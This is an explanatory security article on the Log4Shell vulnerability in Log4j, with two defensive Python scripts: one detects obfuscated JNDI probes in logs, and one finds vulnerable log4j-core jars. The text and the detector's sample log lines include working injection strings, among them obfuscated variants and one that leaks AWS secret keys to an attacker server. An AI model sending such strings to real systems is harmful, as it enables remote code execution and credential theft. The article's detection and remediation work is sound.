Log4j is a logging library that is part of the Apache Logging Services and one of several Java logging frameworks. It is written in Java and is present in millions of applications and services. Log4Shell is the name given to the vulnerability that was found in Log4j.
About Log4J and the Log4Shell Vulnerability
The vulnerability, tracked as CVE-2021-44228 and known as Log4Shell, allows an attacker to get a specially crafted string (typically of the form ${jndi:ldap://attacker-host/...}) written to the log of a vulnerable application. Log4j's message lookup feature evaluates the string instead of treating it as plain text: it connects to the attacker's LDAP, RMI or DNS server via JNDI and loads whatever Java class it is pointed at, which gives the attacker remote code execution on the logging host. From there the attacker can install software for remote access, deploy ransomware, and perform other malicious activities. The issue first drew wide public attention through Minecraft servers, where attackers posted crafted strings in the in-game chat, which the server then logged and evaluated.
When Was the Log4Shell Vulnerability Discovered?
Apache was notified of the bug privately on November 24th, 2021, and it was publicly disclosed on December 9th, 2021, with the CVE record published the following day. Many practitioners have called it one of the worst vulnerabilities of the past decade, because Log4j is deployed across millions of applications and exploitation requires nothing more than getting a string logged. Apple, Amazon, Cloudflare, and many other companies have released statements about their use and remediation of Log4j.
As a precaution, the government of Quebec took roughly 4,000 of its websites offline while it determined which of them were affected by Log4Shell. It has also been reported that Log4Shell can be used to exfiltrate secrets such as AWS credentials without running any code on the target: the injected string can nest other Log4j lookups, for example ${env:AWS_SECRET_ACCESS_KEY}, and their resolved values become part of the hostname or path that the vulnerable server sends to the attacker's LDAP or DNS server.
Attackers are currently using botnets to scan the internet for signs of Log4j so that exposed systems can be exploited. The scans place the lookup string in every input a web stack is likely to log, such as the User-Agent, X-Forwarded-For and Referer headers, URL parameters and form fields, and the payloads are often obfuscated with nested lookups (for example ${${lower:j}ndi:...}) so that a naive search for the literal text "${jndi:" misses them.
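The following detector is an added example for this article (not code from the Log4j project or from any vendor). It shows how the crafted strings described above can be picked out of log lines even when obfuscated: it reduces the three lookups attackers use to hide the word "jndi" (${lower:x}, ${upper:x}, and the default-value form ${prefix:key:-default}, of which ${::-j} is the degenerate case) the way Log4j would, then looks for a jndi: lookup in the result and notes whether the payload also nests value-leaking lookups such as ${env:...}. The sample log lines are constructed for the example and use documentation addresses; the set of "sensitive" lookup prefixes is an assumption about which lookups expose host data.

```python
"""Log4Shell probe detector for log lines, tolerant of nested-lookup obfuscation."""
import re
from typing import Dict, List, Optional, Tuple

# Lookups whose resolved value would end up inside the URL sent to the attacker,
# e.g. ${jndi:ldap://${env:AWS_SECRET_ACCESS_KEY}.attacker.example/a}.
# Assumed list for the example; extend to taste.
SENSITIVE_PREFIXES = {"env", "sys", "java", "main"}

JNDI_RE = re.compile(r"\$\{jndi:([a-z]+):", re.IGNORECASE)

# Constructed sample lines (not real traffic); the quoted field at the end stands
# for the User-Agent header, which nearly every web stack logs.
SAMPLE_LINES = [
    '10.0.0.5 - - [10/Dec/2021:12:00:01 +0000] "GET / HTTP/1.1" 200 "${jndi:ldap://203.0.113.10:1389/a}"',
    '10.0.0.6 - - [10/Dec/2021:12:00:02 +0000] "GET / HTTP/1.1" 200 "${${lower:j}ndi:${lower:l}dap://203.0.113.10/a}"',
    '10.0.0.7 - - [10/Dec/2021:12:00:03 +0000] "GET / HTTP/1.1" 200 "${${::-j}${::-n}${::-d}${::-i}:rmi://203.0.113.10/a}"',
    '10.0.0.8 - - [10/Dec/2021:12:00:04 +0000] "GET / HTTP/1.1" 200 "${jndi:ldap://${env:AWS_SECRET_ACCESS_KEY}.203.0.113.10/a}"',
    '10.0.0.9 - - [10/Dec/2021:12:00:05 +0000] "GET / HTTP/1.1" 200 "Mozilla/5.0 ${date:yyyy}"',
]


class Normalizer:
    """Evaluates the subset of Log4j lookups an attacker can use to assemble 'jndi' at runtime."""

    def __init__(self) -> None:
        self.prefixes: List[str] = []  # every lookup prefix seen, lower-cased

    def _resolve(self, body: str) -> str:
        prefix = body.split(":", 1)[0].lower()  # Log4j lower-cases the prefix too
        self.prefixes.append(prefix)
        if prefix == "lower":
            return body[6:].lower()
        if prefix == "upper":
            return body[6:].upper()
        # Log4j uses the ':-default' part only when the lookup itself fails. We cannot
        # know the target's env/sys values, so we assume those fail, but we keep jndi
        # lookups intact so they remain visible after normalization.
        if prefix != "jndi" and ":-" in body:
            return body.split(":-", 1)[1]
        return "${" + body + "}"  # jndi, env, date, ...: left for inspection

    def _parse(self, s: str, i: int, top: bool) -> Tuple[str, int, bool]:
        """Consume text up to the '}' closing the current lookup; returns (text, pos, closed)."""
        buf: List[str] = []
        while i < len(s):
            if s.startswith("${", i):
                inner, i, closed = self._parse(s, i + 2, False)
                buf.append(self._resolve(inner) if closed else "${" + inner)
            elif s[i] == "}" and not top:
                return "".join(buf), i + 1, True
            else:
                buf.append(s[i])
                i += 1
        return "".join(buf), i, False  # unterminated lookup: kept literally

    def normalize(self, s: str) -> str:
        text, _, _ = self._parse(s, 0, True)
        return text


def inspect(line: str) -> Optional[Dict[str, object]]:
    """Return protocol, leaking lookups and the de-obfuscated line if it carries a JNDI lookup, else None."""
    norm = Normalizer()
    text = norm.normalize(line)
    m = JNDI_RE.search(text)
    if not m:
        return None
    return {
        "protocol": m.group(1).lower(),
        "leaks": sorted(p for p in set(norm.prefixes) if p in SENSITIVE_PREFIXES),
        "normalized": text,
    }


def scan(lines: List[str]) -> List[Tuple[int, Dict[str, object]]]:
    """Run inspect() over a list of log lines and keep the hits with their line index."""
    hits = []
    for idx, line in enumerate(lines):
        result = inspect(line)
        if result:
            hits.append((idx, result))
    return hits


if __name__ == "__main__":
    for idx, hit in scan(SAMPLE_LINES):
        print(f"line {idx}: protocol={hit['protocol']} leaks={hit['leaks']} -> {hit['normalized']}")
```

Run against real logs, feed each line to inspect(); the normalized field is what Log4j would have evaluated, which is useful both for triage and for seeing which host the payload points at. The parser reproduces only the lookups needed for this obfuscation family, so a hit is strong evidence of a probe, while a miss does not prove the absence of one.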
As for remediation, organizations are urged to find every copy of Log4j 2 in their environment and upgrade it to release 2.15.0, the first fix for CVE-2021-44228; that release was later found to be incomplete, and 2.16.0 and then the 2.17.x releases followed, so the upgrade target should be the latest release rather than 2.15.0 itself. Where an upgrade is not immediately possible, the documented mitigation is to remove the JndiLookup class (org/apache/logging/log4j/core/lookup/JndiLookup.class) from the log4j-core jar; setting log4j2.formatMsgNoLookups=true only works on 2.10 and later and was subsequently shown to be insufficient on its own. Organizations are also encouraged to deploy an EDR solution and hunt for malicious activity. Finding Log4j may be a challenge: it is often not immediately clear how many applications use it, because it is frequently bundled inside other vendors' software and nested inside application archives such as WAR and EAR files.
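To make the "find every copy" step concrete, here is an added example scanner (not code from this article or from the Apache project). It walks a directory tree, opens every jar/war/ear, recurses into archives nested inside them, identifies log4j-core by its package prefix rather than by file name (so renamed and shaded copies are found), reads the version from the Maven pom.properties or the manifest, and reports whether the copy is unpatched, mitigated by removal of JndiLookup.class, or patched. The fixture jars built by demo() are constructed stand-ins containing only the entries the scanner looks at; the 2.15.0 and 2.17.1 thresholds apply to the Java 8 line of Log4j 2.

```python
"""Locate log4j-core copies on disk (including nested jars) and classify them."""
import io
import os
import re
import tempfile
import zipfile
from typing import List, Optional, Tuple

CORE_PREFIX = "org/apache/logging/log4j/core/"
JNDI_LOOKUP = CORE_PREFIX + "lookup/JndiLookup.class"
POM_PROPS = "META-INF/maven/org.apache.logging.log4j/log4j-core/pom.properties"
ARCHIVE_EXT = (".jar", ".war", ".ear", ".zip")
FIXED_IN = (2, 15, 0)      # first release fixing CVE-2021-44228 (Java 8 line)
RECOMMENDED = (2, 17, 1)   # follow-up CVEs 2021-45046, 2021-45105 and 2021-44832 moved the bar here
VERSION_RE = re.compile(r"(\d+)\.(\d+)(?:\.(\d+))?")

Version = Tuple[int, int, int]


def parse_version(text: Optional[str]) -> Optional[Version]:
    """'2.14.1' -> (2, 14, 1); '2.0-beta9' -> (2, 0, 0); None if no version is present."""
    m = VERSION_RE.search(text or "")
    return (int(m.group(1)), int(m.group(2)), int(m.group(3) or 0)) if m else None


def archive_version(zf: zipfile.ZipFile, name: str) -> Optional[Version]:
    """Prefer the Maven pom.properties shipped in log4j-core; fall back to a manifest that mentions log4j, then the file name."""
    for entry, sep, key in ((POM_PROPS, "=", "version"), ("META-INF/MANIFEST.MF", ":", "implementation-version")):
        try:
            text = zf.read(entry).decode("utf-8", "replace")
        except KeyError:
            continue
        if sep == ":" and "log4j" not in text.lower():
            continue  # a shaded application jar's own manifest says nothing about the bundled log4j version
        for line in text.splitlines():
            k, _, v = line.partition(sep)
            if k.strip().lower() == key:
                version = parse_version(v)
                if version:
                    return version
    return parse_version(os.path.basename(name))


def classify(version: Optional[Version], has_jndi_lookup: bool) -> str:
    if version is None or version < (2, 0, 0):
        return "version unknown: inspect manually"
    if version >= RECOMMENDED:
        return "patched"
    if version >= FIXED_IN:
        return "CVE-2021-44228 fixed; upgrade to 2.17.1 for the follow-up CVEs"
    if not has_jndi_lookup:
        return "mitigated (JndiLookup.class removed); upgrade when possible"
    return "VULNERABLE"


def inspect_archive(name: str, data: bytes):
    """Yield (path, version, status) for each log4j-core found, recursing into nested archives."""
    try:
        zf = zipfile.ZipFile(io.BytesIO(data))
    except zipfile.BadZipFile:
        return
    with zf:
        names = zf.namelist()
        if any(n.startswith(CORE_PREFIX) for n in names):
            version = archive_version(zf, name)
            yield name, version, classify(version, JNDI_LOOKUP in names)
        for n in names:
            if n.lower().endswith(ARCHIVE_EXT):
                yield from inspect_archive(name + "!/" + n, zf.read(n))


def scan_tree(root: str) -> List[Tuple[str, Optional[Version], str]]:
    findings = []
    for dirpath, _, files in os.walk(root):
        for f in files:
            if f.lower().endswith(ARCHIVE_EXT):
                path = os.path.join(dirpath, f)
                with open(path, "rb") as fh:
                    findings.extend(inspect_archive(path, fh.read()))
    return findings


def make_jar(path: str, version: str, include_jndi_lookup: bool = True) -> None:
    """Constructed fixture (not a real log4j jar): only the entries the scanner cares about."""
    with zipfile.ZipFile(path, "w") as zf:
        zf.writestr("META-INF/MANIFEST.MF", "Manifest-Version: 1.0\r\nImplementation-Title: Apache Log4j Core\r\nImplementation-Version: %s\r\n" % version)
        zf.writestr(POM_PROPS, "version=%s\n" % version)
        zf.writestr(CORE_PREFIX + "Logger.class", b"\xca\xfe\xba\xbe")
        if include_jndi_lookup:
            zf.writestr(JNDI_LOOKUP, b"\xca\xfe\xba\xbe")


def demo() -> dict:
    """Build a small constructed tree and return {relative path: status}."""
    root = tempfile.mkdtemp()
    make_jar(os.path.join(root, "log4j-core-2.14.1.jar"), "2.14.1")
    make_jar(os.path.join(root, "log4j-core-2.14.1-stripped.jar"), "2.14.1", include_jndi_lookup=False)
    make_jar(os.path.join(root, "log4j-core-2.17.1.jar"), "2.17.1")
    with zipfile.ZipFile(os.path.join(root, "other.jar"), "w") as zf:  # unrelated library, must be skipped
        zf.writestr("com/example/App.class", b"\xca\xfe\xba\xbe")
    inner = os.path.join(root, "inner.jar")  # a web app carrying a vulnerable copy in WEB-INF/lib
    make_jar(inner, "2.13.3")
    with zipfile.ZipFile(os.path.join(root, "app.war"), "w") as war:
        war.write(inner, "WEB-INF/lib/log4j-core-2.13.3.jar")
    os.remove(inner)
    return {path[len(root) + 1:]: status for path, _, status in scan_tree(root)}


if __name__ == "__main__":
    for path, status in sorted(demo().items()):
        print(f"{status:<70} {path}")
```

Point scan_tree() at application directories, container image layers and vendor installs; a status of "version unknown" means a log4j-core was found but neither its pom.properties nor a log4j manifest was present, which is exactly the shaded-jar case that file-name searches miss.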
For more details, visit the following pages:
GitHub – authomize/log4j-log4shell-affected: Lists of affected components and affected apps/vendors by CVE-2021-44228 (aka Log4shell or Log4j RCE). This list is meant as a resource for security responders to be able to find and address the vulnerability